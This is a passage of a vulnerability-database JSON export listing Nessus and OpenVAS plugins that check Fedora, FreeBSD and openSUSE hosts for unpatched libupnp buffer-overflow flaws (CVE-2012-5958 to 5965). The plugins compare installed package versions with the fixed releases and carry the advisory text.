audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"libupnp-1.6.18-1.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libupnp\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:11:10", "description": "libupnp 1.6.18\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2013-02-13T00:00:00", "title": "Fedora 17 : libupnp-1.6.18-1.fc17 (2013-1734)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "modified": "2013-02-13T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:17", "p-cpe:/a:fedoraproject:fedora:libupnp"], "id": "FEDORA_2013-1734.NASL", "href": "https://www.tenable.com/plugins/nessus/64600", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-1734.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64600);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-5958\", \"CVE-2012-5959\", \"CVE-2012-5960\", \"CVE-2012-5961\", \"CVE-2012-5962\", \"CVE-2012-5963\", \"CVE-2012-5964\", \"CVE-2012-5965\");\n script_xref(name:\"FEDORA\", value:\"2013-1734\");\n script_xref(name:\"TRA\", value:\"TRA-2017-10\");\n\n script_name(english:\"Fedora 17 : libupnp-1.6.18-1.fc17 (2013-1734)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"libupnp 1.6.18\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=883790\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-February/098643.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fba244f5\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libupnp package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Portable UPnP SDK unique_service_name() Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libupnp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"libupnp-1.6.18-1.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libupnp\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:40:59", "description": "Project changelog reports :\n\nThis patch addresses three possible buffer overflows in function\nunique_service_name().The three issues have the folowing CVE numbers :\n\n- CVE-2012-5958 Issue #2: Stack buffer overflow of Tempbuf\n\n- CVE-2012-5959 Issue #4: Stack buffer overflow of Event->UDN\n\n- CVE-2012-5960 Issue #8: Stack buffer overflow of Event->UDN\n\nNotice that the following issues have already been dealt by previous\nwork :\n\n- CVE-2012-5961 Issue #1: Stack buffer overflow of Evt->UDN\n\n- CVE-2012-5962 Issue #3: Stack buffer overflow of Evt->DeviceType\n\n- CVE-2012-5963 Issue #5: Stack buffer overflow of Event->UDN\n\n- CVE-2012-5964 Issue #6: Stack buffer overflow of Event->DeviceType\n\n- CVE-2012-5965 Issue #7: Stack buffer overflow of Event->DeviceType", "edition": 22, "published": "2013-01-31T00:00:00", "title": "FreeBSD : upnp -- multiple vulnerabilities (2ea6ce3d-6afd-11e2-9d4e-bcaec524bf84)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "modified": "2013-01-31T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:upnp"], "id": "FREEBSD_PKG_2EA6CE3D6AFD11E29D4EBCAEC524BF84.NASL", "href": "https://www.tenable.com/plugins/nessus/64374", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64374);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-5958\", \"CVE-2012-5959\", \"CVE-2012-5960\", \"CVE-2012-5961\", \"CVE-2012-5962\", \"CVE-2012-5963\", \"CVE-2012-5964\", \"CVE-2012-5965\");\n script_xref(name:\"TRA\", value:\"TRA-2017-10\");\n\n script_name(english:\"FreeBSD : upnp -- multiple vulnerabilities (2ea6ce3d-6afd-11e2-9d4e-bcaec524bf84)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Project changelog reports :\n\nThis patch addresses three possible buffer overflows in function\nunique_service_name().The three issues have the folowing CVE numbers :\n\n- CVE-2012-5958 Issue #2: Stack buffer overflow of Tempbuf\n\n- CVE-2012-5959 Issue #4: Stack buffer overflow of Event->UDN\n\n- CVE-2012-5960 Issue #8: Stack buffer overflow of Event->UDN\n\nNotice that the following issues have already been dealt by previous\nwork :\n\n- CVE-2012-5961 Issue #1: Stack buffer overflow of Evt->UDN\n\n- CVE-2012-5962 Issue #3: Stack buffer overflow of Evt->DeviceType\n\n- CVE-2012-5963 Issue #5: Stack buffer overflow of Event->UDN\n\n- CVE-2012-5964 Issue #6: Stack buffer overflow of Event->DeviceType\n\n- CVE-2012-5965 Issue #7: Stack buffer overflow of Event->DeviceType\"\n );\n # https://vuxml.freebsd.org/freebsd/2ea6ce3d-6afd-11e2-9d4e-bcaec524bf84.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a445997f\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-10\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Portable UPnP SDK unique_service_name() Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:upnp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/11/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"upnp<1.6.18\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:27:04", "description": " - Update to version 1.6.18 (bnc#801061)\n\n + Security fix for CERT issue VU#922681 This patch\n addresses three possible buffer overflows in function\n unique_service_name(). The three issues have the\n folowing CVE numbers: CVE-2012-5958 Issue #2:\n Stack-based buffer overflow of Tempbuf CVE-2012-5959\n Issue #4: Stack-based buffer overflow of Event->UDN\n CVE-2012-5960 Issue #8: Stack-based buffer overflow of\n Event->UDN\n\n + Notice that the following issues have already been dealt\n by previous work: CVE-2012-5961 Issue #1: Stack-based\n buffer overflow of Evt->UDN CVE-2012-5962 Issue #3:\n Stack-based buffer overflow of Evt->DeviceType\n CVE-2012-5963 Issue #5: Stack-based buffer overflow of\n Event->UDN CVE-2012-5964 Issue #6: Stack-based buffer\n overflow of Event->DeviceType CVE-2012-5965 Issue #7:\n Stack-based buffer overflow of Event->DeviceType", "edition": 20, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : libupnp (openSUSE-SU-2013:0255-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libupnp6", "p-cpe:/a:novell:opensuse:libupnp6-debuginfo", "p-cpe:/a:novell:opensuse:libupnp-devel", "cpe:/o:novell:opensuse:12.1", "p-cpe:/a:novell:opensuse:libupnp6-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libupnp6-32bit", "p-cpe:/a:novell:opensuse:libupnp6-debugsource", "p-cpe:/a:novell:opensuse:libupnp-debugsource", "cpe:/o:novell:opensuse:12.2"], "id": "OPENSUSE-2013-90.NASL", "href": "https://www.tenable.com/plugins/nessus/75214", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2013-90.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75214);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-5958\", \"CVE-2012-5959\", \"CVE-2012-5960\", \"CVE-2012-5961\", \"CVE-2012-5962\", \"CVE-2012-5963\", \"CVE-2012-5964\", \"CVE-2012-5965\");\n script_xref(name:\"TRA\", value:\"TRA-2017-10\");\n\n script_name(english:\"openSUSE Security Update : libupnp (openSUSE-SU-2013:0255-1)\");\n script_summary(english:\"Check for the openSUSE-2013-90 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Update to version 1.6.18 (bnc#801061)\n\n + Security fix for CERT issue VU#922681 This patch\n addresses three possible buffer overflows in function\n unique_service_name(). The three issues have the\n folowing CVE numbers: CVE-2012-5958 Issue #2:\n Stack-based buffer overflow of Tempbuf CVE-2012-5959\n Issue #4: Stack-based buffer overflow of Event->UDN\n CVE-2012-5960 Issue #8: Stack-based buffer overflow of\n Event->UDN\n\n + Notice that the following issues have already been dealt\n by previous work: CVE-2012-5961 Issue #1: Stack-based\n buffer overflow of Evt->UDN CVE-2012-5962 Issue #3:\n Stack-based buffer overflow of Evt->DeviceType\n CVE-2012-5963 Issue #5: Stack-based buffer overflow of\n Event->UDN CVE-2012-5964 Issue #6: Stack-based buffer\n overflow of Event->DeviceType CVE-2012-5965 Issue #7:\n Stack-based buffer overflow of Event->DeviceType\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=801061\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2013-02/msg00013.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libupnp packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Portable UPnP SDK unique_service_name() Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libupnp-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libupnp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libupnp6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libupnp6-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libupnp6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libupnp6-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libupnp6-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.1|SUSE12\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.1 / 12.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.1\", reference:\"libupnp-devel-1.6.18-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"libupnp6-1.6.18-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"libupnp6-debuginfo-1.6.18-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"libupnp6-debugsource-1.6.18-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"libupnp6-32bit-1.6.18-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"libupnp6-debuginfo-32bit-1.6.18-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"libupnp-debugsource-1.6.18-6.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"libupnp-devel-1.6.18-6.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"libupnp6-1.6.18-6.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"libupnp6-debuginfo-1.6.18-6.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"libupnp6-32bit-1.6.18-6.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"libupnp6-debuginfo-32bit-1.6.18-6.4.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libupnp-devel / libupnp6 / libupnp6-32bit / libupnp6-debuginfo / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:38:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-02-15T00:00:00", "id": "OPENVAS:1361412562310865345", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865345", "type": "openvas", "title": "Fedora Update for libupnp FEDORA-2013-1713", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libupnp FEDORA-2013-1713\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_tag(name:\"affected\", value:\"libupnp on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-February/098665.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865345\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-15 11:13:21 +0530 (Fri, 15 Feb 2013)\");\n script_cve_id(\"CVE-2012-5958\", \"CVE-2012-5959\", \"CVE-2012-5960\", \"CVE-2012-5961\",\n \"CVE-2012-5962\", \"CVE-2012-5963\", \"CVE-2012-5964\", \"CVE-2012-5965\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2013-1713\");\n script_name(\"Fedora Update for libupnp FEDORA-2013-1713\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libupnp'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"libupnp\", rpm:\"libupnp~1.6.18~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-24T11:10:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "description": "Check for the Version of libupnp", "modified": "2018-01-24T00:00:00", "published": "2013-02-15T00:00:00", "id": "OPENVAS:865353", "href": "http://plugins.openvas.org/nasl.php?oid=865353", "type": "openvas", "title": "Fedora Update for libupnp FEDORA-2013-1734", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libupnp FEDORA-2013-1734\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"libupnp on Fedora 17\";\ntag_insight = \"The Universal Plug and Play (UPnP) SDK for Linux provides\n support for building UPnP-compliant control points, devices,\n and bridges on Linux.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-February/098643.html\");\n script_id(865353);\n script_version(\"$Revision: 8509 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-24 07:57:46 +0100 (Wed, 24 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-15 11:14:13 +0530 (Fri, 15 Feb 2013)\");\n script_cve_id(\"CVE-2012-5958\", \"CVE-2012-5959\", \"CVE-2012-5960\", \"CVE-2012-5961\",\n \"CVE-2012-5962\", \"CVE-2012-5963\", \"CVE-2012-5964\", \"CVE-2012-5965\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2013-1734\");\n script_name(\"Fedora Update for libupnp FEDORA-2013-1734\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of libupnp\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"libupnp\", rpm:\"libupnp~1.6.18~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n 